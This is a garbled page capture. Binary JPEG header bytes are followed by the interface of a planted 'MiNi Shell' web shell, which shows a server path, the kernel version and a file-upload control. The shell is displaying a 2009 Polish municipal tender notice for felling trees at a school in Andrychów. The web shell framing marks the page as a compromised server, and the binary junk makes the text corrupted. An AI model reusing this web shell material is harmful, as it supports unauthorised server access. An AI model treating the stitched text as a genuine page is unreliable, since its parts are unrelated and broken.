JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090326/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090326/79330-N-2009.html

<p class="kh_header"><b>Andrychów: Wycinka drzew na terenie Gimnazjum nr 2 w Andrychowie</b><br>
<b>Numer ogłoszenia: 79330 - 2009; data zamieszczenia: 26.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Andrychów reprezentowana przez Burmistrza , Rynek 15, 34-120 Andrychów, woj. małopolskie, tel. (0-33) 875-23-60, faks (0-33) 875-29-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.andrychow.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wycinka drzew na terenie Gimnazjum nr 2 w Andrychowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje następujący zakres usług:

- Wycinka 100 sztuk drzew zgodnie decyzjami:
a) decyzją Starosty Wadowickiego znak: WOŚ-6114/48/2008 z dnia 25.08.2008 zezwalającą na usunięcie: 
13 sztuk topoli o obwodach pni odpowiednio 193cm, 193cm, 154cm, 139cm, 128cm, 136cm, 157cm, 127cm, 140cm, 151cm, 98cm, 94cm, 120cm;
17 sztuk robini akacjowej  o obwodach pni odpowiednio 51cm, 58cm, 47cm, 66cm, 55cm, 63cm, 58cm, 57cm, 59cm, 42cm, 91cm, 76cm, 117cm, o dwu pniach 82cm i 81cm, o trzech pniach 66cm i 67cm i 47cm, 64cm i 70cm i 51cm, 50cm i 55cm i 45cm;
27 sztuk wierzby o obwodach pni odpowiednio 37cm, 40cm, 45cm, 45cm, 38cm, 47cm, 46cm, 48cm, 57cm, 52cm, 67cm, 44cm, 64cm, 60cm, 33cm, 74cm, 56cm, 29cm, 49cm, 54cm, 37cm, 47cm, 63cm, 100cm, 107cm, 105cm,  o dwu pniach 62cm i 63cm;
4 sztuk jarzębiny  o obwodach pni odpowiednio 54cm, 62cm, 78cm, 41cm;
2 sztuk graba  o obwodach pni odpowiednio 75cm, 47cm;

b) decyzją Starosty Wadowickiego znak: WOŚ-6114/48/08/09 z dnia 23.01.2009r. zezwalającą na usunięcie: 
24 sztuk graba  o obwodach pni odpowiednio 50cm, 24cm, 18cm, 20cm, 21cm, 31cm, 29cm, 33cm, 28cm, 40cm, 51cm, 16cm, 51cm, 43cm, 24cm, 56cm, 42cm, 30cm, 51cm, o dwu pniach 27cm i 23cm, 21cm i 37cm, 20cm i 17cm, 20cm i 51cm,  o trzech pniach 26cm i 26cm i 29cm;
11 sztuk wierzby  o obwodach pni odpowiednio 61cm, 71cm, 86cm, 26cm, 21cm, 50cm, 67cm, 67cm, 85cm, 54cm,  o dwu pniach 69cm i 51cm;
1 sztuki lipy o obwodzie pnia 27cm;
1 sztuki brzozy o obwodzie pnia 65cm;
oraz 34,5 m2  krzewów ozdobnych.

- ułożenie wyciętych drzew pni w dłużycach o długości min 4 m oddzielnie wg gatunków drewna, a pozostałe części pnia: kłody, wyżynki oraz konary o średnicy powyżej 20cm także składować oddzielnie wg gatunków drewna na terenie wycinki wzdłuż ogrodzenia,
- zagospodarowanie pozostałości po wyciętych drzewach /mniejszych konarów, gałęzi/ i innych odpadów we własnym zakresie poprzez skierowanie np. do kompostowania oraz składowanie na wysypisku odpadów komunalnych - zgodnie z obowiązującymi przepisami prawa,
-  uporządkowanie terenu po pracach wycinki drzew,
- w okresach przerw w pracach usuwania drzew należy miejsce po zdemontowanym przęśle ogrodzenia zabezpieczyć w ten sposób, by uniemożliwić wejście osobom nieupoważnionym na teren wycinki, 
-  Wykonawcę obciążają wszelkie koszty związane z realizacją przedmiotu zamówienia.
- Wykonawca ponosi odpowiedzialność za szkody powstałe w wyniku realizacji przedmiotu zamówienia. 

    Wykonawca zobowiązany jest do zdobycia wszelkich informacji, w tym dokonanie wizji lokalnej w terenie objętym zamówieniem, które mogą być konieczne do prawidłowej wyceny wartości usługi gdyż wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do wykonania umowy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.21.14.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:

1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień
2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego  i osób zdolnych do wykonania zamówienia
3)Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia
4)Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2. Wykaz oświadczeń i dokumentów jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.

W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych Zamawiający żąda przedstawienia następujących dokumentów:

A.   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

B. Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust.1 ustawy Prawo zamówień publicznych (według wzoru - załącznik nr 1 lub w przypadku wykonawców składających wspólną ofertę - załącznik 1a i 1b).


W celu potwierdzenia, opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia Zamawiający żąda następujących dokumentów:

C. Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - w przypadku gdy wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia.

D. Wykaz wykonanych usług w okresie ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu , dat wykonania i odbiorców wraz z załączeniem dokumentów, że usługi zostały wykonane należycie (według wzoru załącznik nr - 2 do niniejszej specyfikacji)

      Wykonawca powinien wykazać że:
   - w ciągu ostatnich trzech lat tj. 2006-2009 wykonał co najmniej jedno podobne zamówienie odpowiadające rodzajem i wartością przedmiotowi zamówienia.

E. Wykaz niezbędnych do wykonania zamówienia narzędzi, jakimi dysponuje wykonawca. (według wzoru -  załącznik nr 3 do niniejszej specyfikacji)

    Wykonawca powinien wykazać że:
     - dysponuje następującym sprzętem:
       piłą spalinową - min 1 szt

F. Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności - (według wzoru - załącznik nr 4 do niniejszej specyfikacji) 

     Wykonawca powinien wykazać że:
     - dysponuje min. 1 osobą posiadającą kwalifikacje zawodowe do wykonywania prac na wysokościach powyżej 3 m oraz kwalifikacje zawodowe do obsługi pił do ścinki drzew.

W celu potwierdzenia, opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający żąda następującego dokumentu:

G. Polisa, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.

  Wykonawca powinien wykazać że:
  - posiada polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 10 000 zł.

Oprócz wyżej wymienionych dokumentów i oświadczeń oferta będzie zawierać:

H. Formularz ofertowy (według wzoru - załącznik nr  5  do niniejszej specyfikacji)

I. Wzór umowy (załącznik nr 6) zatwierdzony przez osobę lub osoby uprawnione do  reprezentowania Wykonawcy.

Dotyczy wykonawców składających wspólną ofertę: 

W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokumenty, o których mowa w pkt. C, D, E, F, G, H, I, składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną.
Dokument, o którym mowa w pkt. A, G składa każdy z podmiotów wspólnie ubiegających się o udzielenie zamówienia.

Co do dokumentu określonego w pkt B:
oświadczenie w zakresie warunku 1) i 4) określonego w pkt III. 1 nin. specyfikacji składa każdy z podmiotów wspólnie ubiegających się o udzielenie zamówienia (według wzoru - załącznik 1a)
oświadczenie w zakresie warunku 2) i 3) określonego w pkt III. 1 nin. specyfikacji składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną (według wzoru - załącznik 1b).

Jeżeli oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia została wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.andrychow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Andrychowie, Rynek 15, pok. 117 (Wydział Inwestycji) w godzinach: 7.30 - 15.30 poniedziałek, środa, czwartek, piątek oraz 8.00 - 16.00  wtorek lub za zaliczeniem pocztowym.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.04.2009 godzina 09:00, miejsce: siedziba Urzędu Miejskiego w Andrychowie: 34-120 Andrychów, Rynek 15,  sekretariat II piętro, do dnia 02.04.2009 r.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com